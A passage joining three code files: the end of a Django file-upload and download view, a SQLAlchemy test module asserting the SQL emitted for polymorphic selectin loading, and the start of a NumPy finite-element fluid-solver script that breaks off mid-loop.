        pathname = os.path.join(settings.MEDIA_ROOT, filename)
        with open(pathname, 'wb+') as destination:
            for chunk in file.chunks():
                destination.write(chunk)
        data = {
            # assumes the authenticated user model exposes `openid` -- project-specific
            "uid": request.user.openid,
            "src": pathname
        }
        file = UploadSerializer(data=data)
        if file.is_valid():
            file.save()
            ret = {
                "error_code": 0,
                "data": file.data
            }
            return Response(ret)
        else:
            ret = {
                "error_code": 500,
                "error": file.errors
            }
            return Response(ret)

    def get(self, request, fid):
        """Stream the stored file with id `fid` as an attachment download.

        NOTE(review): raises IndexError when no record matches `fid` --
        consider get_object_or_404 for a proper 404 response.
        """
        file = UploadModel.objects.filter(id=fid)[0]
        src = file.src
        with open(src, 'rb') as f:
            file = File(f)
            response = HttpResponse(file.chunks(), content_type='APPLICATION/OCTET-STREAM')
            response['Content-Disposition'] = 'attachment; filename=' + os.path.basename(src)
            response['Content-Length'] = os.path.getsize(src)
        return response
| carryuteam/CarryU-API | fileupload/views.py | views.py | py | 1,717 | python | en | code | 0 | github-code | 50 |
21558532856 | from sqlalchemy import exc
from sqlalchemy import ForeignKey
from sqlalchemy import Integer
from sqlalchemy import select
from sqlalchemy import String
from sqlalchemy import testing
from sqlalchemy.orm import backref
from sqlalchemy.orm import defaultload
from sqlalchemy.orm import joinedload
from sqlalchemy.orm import lazyload
from sqlalchemy.orm import relationship
from sqlalchemy.orm import selectin_polymorphic
from sqlalchemy.orm import selectinload
from sqlalchemy.orm import Session
from sqlalchemy.orm import with_polymorphic
from sqlalchemy.sql.selectable import LABEL_STYLE_TABLENAME_PLUS_COL
from sqlalchemy.testing import assertsql
from sqlalchemy.testing import eq_
from sqlalchemy.testing import fixtures
from sqlalchemy.testing.assertions import expect_raises_message
from sqlalchemy.testing.assertsql import AllOf
from sqlalchemy.testing.assertsql import CompiledSQL
from sqlalchemy.testing.assertsql import EachOf
from sqlalchemy.testing.assertsql import Or
from sqlalchemy.testing.fixtures import fixture_session
from sqlalchemy.testing.schema import Column
from ._poly_fixtures import _Polymorphic
from ._poly_fixtures import Company
from ._poly_fixtures import Engineer
from ._poly_fixtures import GeometryFixtureBase
from ._poly_fixtures import Manager
from ._poly_fixtures import Person
class BaseAndSubFixture(object):
use_options = False
@classmethod
def setup_classes(cls):
Base = cls.DeclarativeBasic
class A(Base):
__tablename__ = "a"
id = Column(Integer, primary_key=True)
adata = Column(String(50))
bs = relationship("B")
type = Column(String(50))
__mapper_args__ = {
"polymorphic_on": type,
"polymorphic_identity": "a",
}
class ASub(A):
__tablename__ = "asub"
id = Column(ForeignKey("a.id"), primary_key=True)
asubdata = Column(String(50))
cs = relationship("C")
if cls.use_options:
__mapper_args__ = {"polymorphic_identity": "asub"}
else:
__mapper_args__ = {
"polymorphic_load": "selectin",
"polymorphic_identity": "asub",
}
class B(Base):
__tablename__ = "b"
id = Column(Integer, primary_key=True)
a_id = Column(ForeignKey("a.id"))
class C(Base):
__tablename__ = "c"
id = Column(Integer, primary_key=True)
a_sub_id = Column(ForeignKey("asub.id"))
@classmethod
def insert_data(cls, connection):
A, B, ASub, C = cls.classes("A", "B", "ASub", "C")
s = Session(connection)
s.add(A(id=1, adata="adata", bs=[B(), B()]))
s.add(
ASub(
id=2,
adata="adata",
asubdata="asubdata",
bs=[B(), B()],
cs=[C(), C()],
)
)
s.commit()
def _run_query(self, q):
ASub = self.classes.ASub
for a in q:
a.bs
if isinstance(a, ASub):
a.cs
def _assert_all_selectin(self, q):
result = self.assert_sql_execution(
testing.db,
q.all,
CompiledSQL(
"SELECT a.id AS a_id, a.adata AS a_adata, "
"a.type AS a_type FROM a ORDER BY a.id",
{},
),
AllOf(
EachOf(
CompiledSQL(
"SELECT asub.id AS asub_id, a.id AS a_id, "
"a.type AS a_type, "
"asub.asubdata AS asub_asubdata FROM a JOIN asub "
"ON a.id = asub.id "
"WHERE a.id IN (__[POSTCOMPILE_primary_keys]) "
"ORDER BY a.id",
{"primary_keys": [2]},
),
CompiledSQL(
# note this links c.a_sub_id to a.id, even though
# primaryjoin is to asub.id. this is because the
# cols a.id / asub.id are listed in the mapper's
# equivalent_columns so they are guaranteed to store
# the same value.
"SELECT c.a_sub_id AS c_a_sub_id, "
"c.id AS c_id "
"FROM c WHERE c.a_sub_id "
"IN (__[POSTCOMPILE_primary_keys])",
{"primary_keys": [2]},
),
),
CompiledSQL(
"SELECT b.a_id AS b_a_id, b.id AS b_id FROM b "
"WHERE b.a_id IN (__[POSTCOMPILE_primary_keys])",
{"primary_keys": [1, 2]},
),
),
)
self.assert_sql_execution(testing.db, lambda: self._run_query(result))
class LoadBaseAndSubWEagerRelOpt(
    BaseAndSubFixture,
    fixtures.DeclarativeMappedTest,
    testing.AssertsExecutionResults,
):
    """Variant where selectin polymorphic loading is requested per-query
    via loader options (use_options=True) rather than mapper config."""
    use_options = True
    def test_load(self):
        # Load all A rows, eagerly pulling the ASub subtable via
        # selectin_polymorphic plus both relationships via selectinload;
        # the fixture helper then asserts the exact SQL emitted.
        A, B, ASub, C = self.classes("A", "B", "ASub", "C")
        s = fixture_session()
        q = (
            s.query(A)
            .order_by(A.id)
            .options(
                selectin_polymorphic(A, [ASub]),
                selectinload(ASub.cs),
                selectinload(A.bs),
            )
        )
        self._assert_all_selectin(q)
class LoadBaseAndSubWEagerRelMapped(
    BaseAndSubFixture,
    fixtures.DeclarativeMappedTest,
    testing.AssertsExecutionResults,
):
    """Variant relying on polymorphic_load='selectin' configured on the
    mapper (use_options=False); only relationship options are per-query."""
    use_options = False
    def test_load(self):
        A, B, ASub, C = self.classes("A", "B", "ASub", "C")
        s = fixture_session()
        # no selectin_polymorphic() option here -- the mapper-level
        # polymorphic_load setting triggers the subtype load instead
        q = (
            s.query(A)
            .order_by(A.id)
            .options(selectinload(ASub.cs), selectinload(A.bs))
        )
        self._assert_all_selectin(q)
class FixtureLoadTest(_Polymorphic, testing.AssertsExecutionResults):
    """selectin polymorphic loading against the standard _Polymorphic
    fixture (Person / Engineer / Manager, Company)."""

    def test_person_selectin_subclasses(self):
        """One base SELECT over people, then one IN-based SELECT per
        subclass; AllOf() accepts the two subclass loads in any order."""
        s = fixture_session()
        q = s.query(Person).options(
            selectin_polymorphic(Person, [Engineer, Manager])
        )
        result = self.assert_sql_execution(
            testing.db,
            q.all,
            CompiledSQL(
                "SELECT people.person_id AS people_person_id, "
                "people.company_id AS people_company_id, "
                "people.name AS people_name, "
                "people.type AS people_type FROM people",
                {},
            ),
            AllOf(
                CompiledSQL(
                    "SELECT engineers.person_id AS engineers_person_id, "
                    "people.person_id AS people_person_id, "
                    "people.type AS people_type, "
                    "engineers.status AS engineers_status, "
                    "engineers.engineer_name AS engineers_engineer_name, "
                    "engineers.primary_language AS engineers_primary_language "
                    "FROM people JOIN engineers "
                    "ON people.person_id = engineers.person_id "
                    "WHERE people.person_id IN (__[POSTCOMPILE_primary_keys]) "
                    "ORDER BY people.person_id",
                    {"primary_keys": [1, 2, 5]},
                ),
                CompiledSQL(
                    "SELECT managers.person_id AS managers_person_id, "
                    "people.person_id AS people_person_id, "
                    "people.type AS people_type, "
                    "managers.status AS managers_status, "
                    "managers.manager_name AS managers_manager_name "
                    "FROM people JOIN managers "
                    "ON people.person_id = managers.person_id "
                    "WHERE people.person_id IN (__[POSTCOMPILE_primary_keys]) "
                    "ORDER BY people.person_id",
                    {"primary_keys": [3, 4]},
                ),
            ),
        )
        eq_(result, self.all_employees)

    def test_load_company_plus_employees(self):
        """selectin_polymorphic chained off selectinload(Company.employees):
        company SELECT, employees IN-SELECT, then the two subclass loads
        (any order)."""
        s = fixture_session()
        q = (
            s.query(Company)
            .options(
                selectinload(Company.employees).selectin_polymorphic(
                    [Engineer, Manager]
                )
            )
            .order_by(Company.company_id)
        )
        result = self.assert_sql_execution(
            testing.db,
            q.all,
            CompiledSQL(
                "SELECT companies.company_id AS companies_company_id, "
                "companies.name AS companies_name FROM companies "
                "ORDER BY companies.company_id",
                {},
            ),
            CompiledSQL(
                "SELECT people.company_id AS people_company_id, "
                "people.person_id AS people_person_id, "
                "people.name AS people_name, people.type AS people_type "
                "FROM people WHERE people.company_id "
                "IN (__[POSTCOMPILE_primary_keys]) "
                "ORDER BY people.person_id",
                {"primary_keys": [1, 2]},
            ),
            AllOf(
                CompiledSQL(
                    "SELECT managers.person_id AS managers_person_id, "
                    "people.person_id AS people_person_id, "
                    "people.company_id AS people_company_id, "
                    "people.name AS people_name, people.type AS people_type, "
                    "managers.status AS managers_status, "
                    "managers.manager_name AS managers_manager_name "
                    "FROM people JOIN managers "
                    "ON people.person_id = managers.person_id "
                    "WHERE people.person_id IN (__[POSTCOMPILE_primary_keys]) "
                    "ORDER BY people.person_id",
                    {"primary_keys": [3, 4]},
                ),
                CompiledSQL(
                    "SELECT engineers.person_id AS engineers_person_id, "
                    "people.person_id AS people_person_id, "
                    "people.company_id AS people_company_id, "
                    "people.name AS people_name, people.type AS people_type, "
                    "engineers.status AS engineers_status, "
                    "engineers.engineer_name AS engineers_engineer_name, "
                    "engineers.primary_language AS engineers_primary_language "
                    "FROM people JOIN engineers "
                    "ON people.person_id = engineers.person_id "
                    "WHERE people.person_id IN (__[POSTCOMPILE_primary_keys]) "
                    "ORDER BY people.person_id",
                    {"primary_keys": [1, 2, 5]},
                ),
            ),
        )
        eq_(result, [self.c1, self.c2])
class TestGeometries(GeometryFixtureBase):
    """selectin polymorphic loading against dynamically generated
    ("geometry") hierarchies, including single-table subclasses and
    explicit with_polymorphic aliases."""

    def test_threelevel_selectin_to_inline_mapped(self):
        """a -> (b selectin, c selectin -> (d, e inline single-table)):
        mapper-configured loads, no per-query options."""
        self._fixture_from_geometry(
            {
                "a": {
                    "subclasses": {
                        "b": {"polymorphic_load": "selectin"},
                        "c": {
                            "subclasses": {
                                "d": {
                                    "polymorphic_load": "inline",
                                    "single": True,
                                },
                                "e": {
                                    "polymorphic_load": "inline",
                                    "single": True,
                                },
                            },
                            "polymorphic_load": "selectin",
                        },
                    }
                }
            }
        )
        a, b, c, d, e = self.classes("a", "b", "c", "d", "e")
        sess = fixture_session()
        sess.add_all([d(d_data="d1"), e(e_data="e1")])
        sess.commit()
        q = sess.query(a)
        result = self.assert_sql_execution(
            testing.db,
            q.all,
            CompiledSQL(
                "SELECT a.type AS a_type, a.id AS a_id, "
                "a.a_data AS a_a_data FROM a",
                {},
            ),
            # Or(): the d_data / e_data column order in the subclass load
            # is not deterministic, so either rendering is accepted.
            Or(
                CompiledSQL(
                    "SELECT a.type AS a_type, c.id AS c_id, a.id AS a_id, "
                    "c.c_data AS c_c_data, c.e_data AS c_e_data, "
                    "c.d_data AS c_d_data "
                    "FROM a JOIN c ON a.id = c.id "
                    "WHERE a.id IN (__[POSTCOMPILE_primary_keys]) "
                    "ORDER BY a.id",
                    [{"primary_keys": [1, 2]}],
                ),
                CompiledSQL(
                    "SELECT a.type AS a_type, c.id AS c_id, a.id AS a_id, "
                    "c.c_data AS c_c_data, "
                    "c.d_data AS c_d_data, c.e_data AS c_e_data "
                    "FROM a JOIN c ON a.id = c.id "
                    "WHERE a.id IN (__[POSTCOMPILE_primary_keys]) "
                    "ORDER BY a.id",
                    [{"primary_keys": [1, 2]}],
                ),
            ),
        )
        with self.assert_statement_count(testing.db, 0):
            eq_(result, [d(d_data="d1"), e(e_data="e1")])

    def test_threelevel_selectin_to_inline_options(self):
        """Same hierarchy, but the polymorphic loads are requested per
        query via with_polymorphic + selectin_polymorphic options."""
        self._fixture_from_geometry(
            {
                "a": {
                    "subclasses": {
                        "b": {},
                        "c": {
                            "subclasses": {
                                "d": {"single": True},
                                "e": {"single": True},
                            }
                        },
                    }
                }
            }
        )
        a, b, c, d, e = self.classes("a", "b", "c", "d", "e")
        sess = fixture_session()
        sess.add_all([d(d_data="d1"), e(e_data="e1")])
        sess.commit()
        c_alias = with_polymorphic(c, (d, e))
        q = sess.query(a).options(selectin_polymorphic(a, [b, c_alias]))
        result = self.assert_sql_execution(
            testing.db,
            q.all,
            CompiledSQL(
                "SELECT a.type AS a_type, a.id AS a_id, "
                "a.a_data AS a_a_data FROM a",
                {},
            ),
            Or(
                CompiledSQL(
                    "SELECT a.type AS a_type, c.id AS c_id, a.id AS a_id, "
                    "c.c_data AS c_c_data, c.e_data AS c_e_data, "
                    "c.d_data AS c_d_data "
                    "FROM a JOIN c ON a.id = c.id "
                    "WHERE a.id IN (__[POSTCOMPILE_primary_keys]) "
                    "ORDER BY a.id",
                    [{"primary_keys": [1, 2]}],
                ),
                CompiledSQL(
                    "SELECT a.type AS a_type, c.id AS c_id, a.id AS a_id, "
                    "c.c_data AS c_c_data, c.d_data AS c_d_data, "
                    "c.e_data AS c_e_data "
                    "FROM a JOIN c ON a.id = c.id "
                    "WHERE a.id IN (__[POSTCOMPILE_primary_keys]) "
                    "ORDER BY a.id",
                    [{"primary_keys": [1, 2]}],
                ),
            ),
        )
        with self.assert_statement_count(testing.db, 0):
            eq_(result, [d(d_data="d1"), e(e_data="e1")])

    def test_threelevel_selectin_to_inline_awkward_alias_options(self):
        """Use an explicit aliased subquery ("poly") as the
        with_polymorphic selectable and verify the selectin load adapts
        the "a" columns into that alias."""
        self._fixture_from_geometry(
            {
                "a": {
                    "subclasses": {
                        "b": {},
                        "c": {"subclasses": {"d": {}, "e": {}}},
                    }
                }
            }
        )
        a, b, c, d, e = self.classes("a", "b", "c", "d", "e")
        sess = fixture_session()
        sess.add_all([d(d_data="d1"), e(e_data="e1")])
        sess.commit()
        from sqlalchemy import select
        a_table, c_table, d_table, e_table = self.tables("a", "c", "d", "e")
        poly = (
            select(a_table.c.id, a_table.c.type, c_table, d_table, e_table)
            .select_from(
                a_table.join(c_table).outerjoin(d_table).outerjoin(e_table)
            )
            .set_label_style(LABEL_STYLE_TABLENAME_PLUS_COL)
            .alias("poly")
        )
        c_alias = with_polymorphic(c, (d, e), poly)
        q = (
            sess.query(a)
            .options(selectin_polymorphic(a, [b, c_alias]))
            .order_by(a.id)
        )
        result = self.assert_sql_execution(
            testing.db,
            q.all,
            CompiledSQL(
                "SELECT a.type AS a_type, a.id AS a_id, "
                "a.a_data AS a_a_data FROM a ORDER BY a.id",
                {},
            ),
            Or(
                # here, the test is that the adaptation of "a" takes place
                CompiledSQL(
                    "SELECT poly.a_type AS poly_a_type, "
                    "poly.c_id AS poly_c_id, "
                    "poly.a_id AS poly_a_id, poly.c_c_data AS poly_c_c_data, "
                    "poly.e_id AS poly_e_id, poly.e_e_data AS poly_e_e_data, "
                    "poly.d_id AS poly_d_id, poly.d_d_data AS poly_d_d_data "
                    "FROM (SELECT a.id AS a_id, a.type AS a_type, "
                    "c.id AS c_id, "
                    "c.c_data AS c_c_data, d.id AS d_id, "
                    "d.d_data AS d_d_data, "
                    "e.id AS e_id, e.e_data AS e_e_data FROM a JOIN c "
                    "ON a.id = c.id LEFT OUTER JOIN d ON c.id = d.id "
                    "LEFT OUTER JOIN e ON c.id = e.id) AS poly "
                    "WHERE poly.a_id IN (__[POSTCOMPILE_primary_keys]) "
                    "ORDER BY poly.a_id",
                    [{"primary_keys": [1, 2]}],
                ),
                CompiledSQL(
                    "SELECT poly.a_type AS poly_a_type, "
                    "poly.c_id AS poly_c_id, "
                    "poly.a_id AS poly_a_id, poly.c_c_data AS poly_c_c_data, "
                    "poly.d_id AS poly_d_id, poly.d_d_data AS poly_d_d_data, "
                    "poly.e_id AS poly_e_id, poly.e_e_data AS poly_e_e_data "
                    "FROM (SELECT a.id AS a_id, a.type AS a_type, "
                    "c.id AS c_id, c.c_data AS c_c_data, d.id AS d_id, "
                    "d.d_data AS d_d_data, e.id AS e_id, "
                    "e.e_data AS e_e_data FROM a JOIN c ON a.id = c.id "
                    "LEFT OUTER JOIN d ON c.id = d.id "
                    "LEFT OUTER JOIN e ON c.id = e.id) AS poly "
                    "WHERE poly.a_id IN (__[POSTCOMPILE_primary_keys]) "
                    "ORDER BY poly.a_id",
                    [{"primary_keys": [1, 2]}],
                ),
            ),
        )
        with self.assert_statement_count(testing.db, 0):
            eq_(result, [d(d_data="d1"), e(e_data="e1")])

    def test_partial_load_no_invoke_eagers(self):
        # test issue #4199
        self._fixture_from_geometry(
            {
                "a": {
                    "subclasses": {
                        "a1": {"polymorphic_load": "selectin"},
                        "a2": {"polymorphic_load": "selectin"},
                    }
                }
            }
        )
        a, a1, a2 = self.classes("a", "a1", "a2")
        sess = fixture_session()
        a1_obj = a1()
        a2_obj = a2()
        sess.add_all([a1_obj, a2_obj])
        # drop the strong reference so the a2 state can be garbage
        # collected once expired
        del a2_obj
        sess.flush()
        sess.expire_all()
        # _with_invoke_all_eagers(False), used by the lazy loader
        # strategy, will cause one less state to be present such that
        # the poly loader won't locate a state limited to the "a1" mapper,
        # needs to test that it has states
        sess.query(a)._with_invoke_all_eagers(False).all()
class LoaderOptionsTest(
    fixtures.DeclarativeMappedTest, testing.AssertsExecutionResults
):
    """Assert that per-query loader options applied to a selectin-loaded
    subclass do not leak into ("pollute") subsequent queries, both with
    and without the baked-query cache enabled."""

    @classmethod
    def setup_classes(cls):
        Base = cls.DeclarativeBasic

        class Parent(fixtures.ComparableEntity, Base):
            __tablename__ = "parent"
            id = Column(Integer, primary_key=True)

        class Child(fixtures.ComparableEntity, Base):
            __tablename__ = "child"
            id = Column(Integer, primary_key=True)
            parent_id = Column(Integer, ForeignKey("parent.id"))
            parent = relationship("Parent", backref=backref("children"))
            type = Column(String(50), nullable=False)
            __mapper_args__ = {"polymorphic_on": type}

        class ChildSubclass1(Child):
            __tablename__ = "child_subclass1"
            id = Column(Integer, ForeignKey("child.id"), primary_key=True)
            # subclass columns always load via selectin after the base row
            __mapper_args__ = {
                "polymorphic_identity": "subclass1",
                "polymorphic_load": "selectin",
            }

        class Other(fixtures.ComparableEntity, Base):
            __tablename__ = "other"
            id = Column(Integer, primary_key=True)
            child_subclass_id = Column(
                Integer, ForeignKey("child_subclass1.id")
            )
            child_subclass = relationship(
                "ChildSubclass1", backref=backref("others")
            )

    @classmethod
    def insert_data(cls, connection):
        # one Parent -> one ChildSubclass1 -> one Other
        Parent, ChildSubclass1, Other = cls.classes(
            "Parent", "ChildSubclass1", "Other"
        )
        session = Session(connection)
        parent = Parent(id=1)
        subclass1 = ChildSubclass1(id=1, parent=parent)
        other = Other(id=1, child_subclass=subclass1)
        session.add_all([parent, subclass1, other])
        session.commit()

    def test_options_dont_pollute_baked(self):
        self._test_options_dont_pollute(True)

    def test_options_dont_pollute_unbaked(self):
        self._test_options_dont_pollute(False)

    def _test_options_dont_pollute(self, enable_baked):
        Parent, ChildSubclass1, Other = self.classes(
            "Parent", "ChildSubclass1", "Other"
        )
        session = fixture_session(enable_baked_queries=enable_baked)

        def no_opt():
            # Baseline query WITHOUT the joinedload of ChildSubclass1.others;
            # run before and after the optioned query to prove the option
            # did not stick to the cached selectin load.
            q = session.query(Parent).options(
                joinedload(Parent.children.of_type(ChildSubclass1))
            )
            return self.assert_sql_execution(
                testing.db,
                q.all,
                CompiledSQL(
                    "SELECT parent.id AS parent_id, "
                    "anon_1.child_id AS anon_1_child_id, "
                    "anon_1.child_parent_id AS anon_1_child_parent_id, "
                    "anon_1.child_type AS anon_1_child_type, "
                    "anon_1.child_subclass1_id AS anon_1_child_subclass1_id "
                    "FROM parent "
                    "LEFT OUTER JOIN (SELECT child.id AS child_id, "
                    "child.parent_id AS child_parent_id, "
                    "child.type AS child_type, "
                    "child_subclass1.id AS child_subclass1_id "
                    "FROM child "
                    "LEFT OUTER JOIN child_subclass1 "
                    "ON child.id = child_subclass1.id) AS anon_1 "
                    "ON parent.id = anon_1.child_parent_id",
                    {},
                ),
                CompiledSQL(
                    "SELECT child_subclass1.id AS child_subclass1_id, "
                    "child.id AS child_id, "
                    "child.parent_id AS child_parent_id, "
                    "child.type AS child_type "
                    "FROM child JOIN child_subclass1 "
                    "ON child.id = child_subclass1.id "
                    "WHERE child.id IN (__[POSTCOMPILE_primary_keys]) "
                    "ORDER BY child.id",
                    [{"primary_keys": [1]}],
                ),
            )

        result = no_opt()
        # one lazy load remains for Other in the un-optioned case
        with self.assert_statement_count(testing.db, 1):
            eq_(result, [Parent(children=[ChildSubclass1(others=[Other()])])])
        session.expunge_all()
        # now run WITH the chained joinedload of ChildSubclass1.others;
        # the selectin load should include the LEFT OUTER JOIN to "other"
        q = session.query(Parent).options(
            joinedload(Parent.children.of_type(ChildSubclass1)).joinedload(
                ChildSubclass1.others
            )
        )
        result = self.assert_sql_execution(
            testing.db,
            q.all,
            CompiledSQL(
                "SELECT parent.id AS parent_id, "
                "anon_1.child_id AS anon_1_child_id, "
                "anon_1.child_parent_id AS anon_1_child_parent_id, "
                "anon_1.child_type AS anon_1_child_type, "
                "anon_1.child_subclass1_id AS anon_1_child_subclass1_id, "
                "other_1.id AS other_1_id, "
                "other_1.child_subclass_id AS other_1_child_subclass_id "
                "FROM parent LEFT OUTER JOIN "
                "(SELECT child.id AS child_id, "
                "child.parent_id AS child_parent_id, "
                "child.type AS child_type, "
                "child_subclass1.id AS child_subclass1_id "
                "FROM child LEFT OUTER JOIN child_subclass1 "
                "ON child.id = child_subclass1.id) AS anon_1 "
                "ON parent.id = anon_1.child_parent_id "
                "LEFT OUTER JOIN other AS other_1 "
                "ON anon_1.child_subclass1_id = other_1.child_subclass_id",
                {},
            ),
            CompiledSQL(
                "SELECT child_subclass1.id AS child_subclass1_id, "
                "child.id AS child_id, child.parent_id AS child_parent_id, "
                "child.type AS child_type, other_1.id AS other_1_id, "
                "other_1.child_subclass_id AS other_1_child_subclass_id "
                "FROM child JOIN child_subclass1 "
                "ON child.id = child_subclass1.id "
                "LEFT OUTER JOIN other AS other_1 "
                "ON child_subclass1.id = other_1.child_subclass_id "
                "WHERE child.id IN (__[POSTCOMPILE_primary_keys]) "
                "ORDER BY child.id",
                [{"primary_keys": [1]}],
            ),
        )
        # everything eagerly loaded; no further statements
        with self.assert_statement_count(testing.db, 0):
            eq_(result, [Parent(children=[ChildSubclass1(others=[Other()])])])
        session.expunge_all()
        # the baseline query must behave exactly as before
        result = no_opt()
        with self.assert_statement_count(testing.db, 1):
            eq_(result, [Parent(children=[ChildSubclass1(others=[Other()])])])
class IgnoreOptionsOnSubclassAttrLoad(fixtures.DeclarativeMappedTest):
    """test #7304 and related cases

    in this case we trigger the subclass attribute load, while at the same
    time there will be a deferred loader option present in the state's
    options that was established by the previous loader.

    test both that the option takes effect (i.e. raiseload) and that a deferred
    loader doesn't interfere with the mapper's load of the attribute.

    """

    @classmethod
    def setup_classes(cls):
        Base = cls.DeclarativeBasic

        class Parent(Base):
            __tablename__ = "parent"
            id = Column(
                Integer, primary_key=True, test_needs_autoincrement=True
            )
            entity_id = Column(ForeignKey("entity.id"))
            entity = relationship("Entity")

        class Entity(Base):
            __tablename__ = "entity"
            id = Column(
                Integer, primary_key=True, test_needs_autoincrement=True
            )
            type = Column(String(32))
            __mapper_args__ = {
                "polymorphic_on": type,
                "polymorphic_identity": "entity",
            }

        class SubEntity(Entity):
            __tablename__ = "sub_entity"
            id = Column(ForeignKey(Entity.id), primary_key=True)
            # subclass-only column whose load is what the test exercises
            name = Column(String(32))
            __mapper_args__ = {"polymorphic_identity": "entity_two"}

    @classmethod
    def insert_data(cls, connection):
        Parent, SubEntity = cls.classes("Parent", "SubEntity")
        with Session(connection) as session:
            session.add(Parent(entity=SubEntity(name="some name")))
            session.commit()

    @testing.combinations(
        defaultload,
        joinedload,
        selectinload,
        lazyload,
        argnames="first_option",
    )
    @testing.combinations(
        ("load_only", "id", True),
        ("defer", "name", True),
        ("undefer", "name", True),
        ("raise", "name", False),
        (None, None, True),
        # these don't seem possible at the moment as the "type" column
        # doesn't load and it can't recognize the polymorphic identity.
        # we assume load_only() is smart enough to include this column
        # ("defer", '*', True),
        # ("undefer", '*', True),
        # ("raise", '*', False),
        argnames="second_option,second_argument,expect_load",
    )
    def test_subclass_loadattr(
        self, first_option, second_option, second_argument, expect_load
    ):
        """Load a Parent with a combination of relationship strategy and
        column-deferral options, then touch SubEntity.name and assert
        both the outcome (loaded vs. raise) and the exact SQL emitted."""
        Parent, Entity, SubEntity = self.classes(
            "Parent", "Entity", "SubEntity"
        )
        stmt = select(Parent)
        # defaultload/lazyload defer the Entity load to attribute access
        will_lazyload = first_option in (defaultload, lazyload)
        opt = first_option(Parent.entity)
        if second_argument == "name":
            second_argument = SubEntity.name
        elif second_argument == "id":
            second_argument = Entity.id
        if second_option is None:
            sub_opt = opt
        elif second_option == "raise":
            sub_opt = opt.defer(second_argument, raiseload=True)
        else:
            sub_opt = getattr(opt, second_option)(second_argument)
        stmt = stmt.options(sub_opt)
        session = fixture_session()
        result = session.execute(stmt).scalars()
        parent_obj = result.first()
        # read the FK straight from __dict__ to avoid triggering a load
        entity_id = parent_obj.__dict__["entity_id"]
        with assertsql.assert_engine(testing.db) as asserter_:
            if expect_load:
                eq_(parent_obj.entity.name, "some name")
            else:
                with expect_raises_message(
                    exc.InvalidRequestError,
                    "'SubEntity.name' is not available due to raiseload=True",
                ):
                    parent_obj.entity.name
        expected = []
        if will_lazyload:
            expected.append(
                CompiledSQL(
                    "SELECT entity.id AS entity_id, "
                    "entity.type AS entity_type FROM entity "
                    "WHERE entity.id = :pk_1",
                    [{"pk_1": entity_id}],
                )
            )
        if second_option in ("undefer", "load_only", None):
            # load will be a mapper optimized load for the name alone
            expected.append(
                CompiledSQL(
                    "SELECT sub_entity.name AS sub_entity_name "
                    "FROM sub_entity "
                    "WHERE :param_1 = sub_entity.id",
                    [{"param_1": entity_id}],
                )
            )
        elif second_option == "defer":
            # load will be a deferred load.  this is because the explicit
            # call to the deferred load put a deferred loader on the attribute
            expected.append(
                CompiledSQL(
                    "SELECT sub_entity.name AS sub_entity_name FROM entity "
                    "JOIN sub_entity ON entity.id = sub_entity.id "
                    "WHERE entity.id = :pk_1",
                    [{"pk_1": entity_id}],
                )
            )
        asserter_.assert_(*expected)
| jorgemorgado/sqlalchemy | test/orm/inheritance/test_poly_loading.py | test_poly_loading.py | py | 31,456 | python | en | code | 1 | github-code | 50 |
30688863609 | import numpy as np
import scipy.io as scio
# Local path (original author's machine):
# D:\FluidSim\FluidSim\FEMNEW\Navier-stokes-Satsit14master
#
# Q2/Q1-style element assembly for a Navier-Stokes FEM solver ported from
# MATLAB: 8-node serendipity shape functions N for velocity, 4-node bilinear
# shape functions M for pressure, integrated with a 3x3 Gauss rule.
# NOTE(review): the indentation of this script was reconstructed from a
# whitespace-mangled source; loop nesting should be confirmed against the
# original MATLAB/Python file.
tmax = 100
# Element connectivity; "- 1" shifts MATLAB 1-based indices to 0-based.
celem = scio.loadmat('celem.mat')['celem'] - 1
node = scio.loadmat('node.mat')['node']
nmax = 341
# Initial velocity field: uniform u, zero v.
u0 = np.ones((nmax))
v0 = np.zeros((nmax))
numOfElements = 100
for t in range(0, tmax):
    # Assembly matrix
    for e in range(numOfElements):
        # 3-point Gauss-Legendre abscissae/weights -> 9-point tensor rule.
        xp = np.array([-np.sqrt(3/5), 0, np.sqrt(3/5)])
        wp = np.array([5/9, 8/9, 5/9])
        w = np.zeros((9))
        gp = np.zeros((9, 2))
        ngp = 9
        for i in range(3):
            for j in range(3):
                idx = int(3 * i + j)
                w[idx] = wp[i] * wp[j]
                gp[idx, 0] = xp[j]
                gp[idx, 1] = xp[i]
        # Shape functions and their reference-coordinate derivatives,
        # tabulated at every Gauss point.
        N = np.zeros((8, 9))
        dN = np.zeros((2, 8, 9))
        M = np.zeros((4, 9))
        dM = np.zeros((2, 4, 9))
        # Element sub-matrices (velocity-velocity and velocity-pressure).
        A1 = np.zeros((8, 8))
        A2 = np.zeros((8, 4))
        A8 = np.zeros((8, 4))
        A4 = np.zeros((4, 8))
        A6 = np.zeros((4, 8))
        for k in range(ngp):
            xi = gp[k, 0]
            eta = gp[k, 1]
            # 8-node serendipity shape functions (corner + mid-side nodes).
            N[0, k] = -(1 - xi) * (1 - eta) * (1 + xi + eta) / 4
            N[1, k] = (1 - 2*xi)*(1 - eta) / 2
            N[2, k] = -(1 + xi)*(1 - eta)*(1 - xi + eta) / 4
            N[3, k] = (1 + xi)*(1 - eta**2) / 2
            N[4, k] = -(1 + xi)*(1 + eta)*(1 - xi - eta) / 4
            N[5, k] = (1 - xi**2)*(1 + eta)/2
            N[6, k] = -(1 - xi)*(1 + eta)*(1 + xi - eta)/4
            N[7, k] = (1 - xi)*(1 - eta**2)/2
            # d/dxi of N
            dN[0, 0, k] = (1 - eta) * (2 * xi + eta) / 4
            dN[0, 1, k] = - xi * (1 - eta)
            dN[0, 2, k] = (eta - 1)*(eta - 2*xi)/4
            dN[0, 3, k] = (1 - eta**2)/2
            dN[0, 4, k] = (eta + 1)*(eta + 2*xi)/4
            dN[0, 5, k] = - xi * (eta + 1)
            dN[0, 6, k] = -(1 + eta)*(eta - 2*xi)/4
            dN[0, 7, k] = (-1 + eta**2) / 2
            # d/deta of N
            dN[1, 0, k] = (1 - xi)*(2 * eta + xi)/4
            dN[1, 1, k] = (-1 + xi**2)/2
            dN[1, 2, k] = (1 + xi)*(2*eta - xi)/4
            dN[1, 3, k] = -eta*(1 + xi)
            dN[1, 4, k] = (1 + xi)*(xi + 2*eta)/4
            dN[1, 5, k] = (1 - xi**2)/2
            dN[1, 6, k] = (1 - xi)*(2*eta - xi)/4
            dN[1, 7, k] = eta * (xi - 1)
            # 4-node bilinear shape functions for pressure.
            M[0, k] = (1 - xi)*(1 - eta)/4
            M[1, k] = (1 + xi)*(1 - eta)/4
            M[2, k] = (1 + xi)*(1 + eta)/4
            M[3, k] = (1 - xi)*(1 + eta)/4
            dM[0, 0, k] = - (1 - eta)/4
            dM[0, 1, k] = (1 - eta)/4
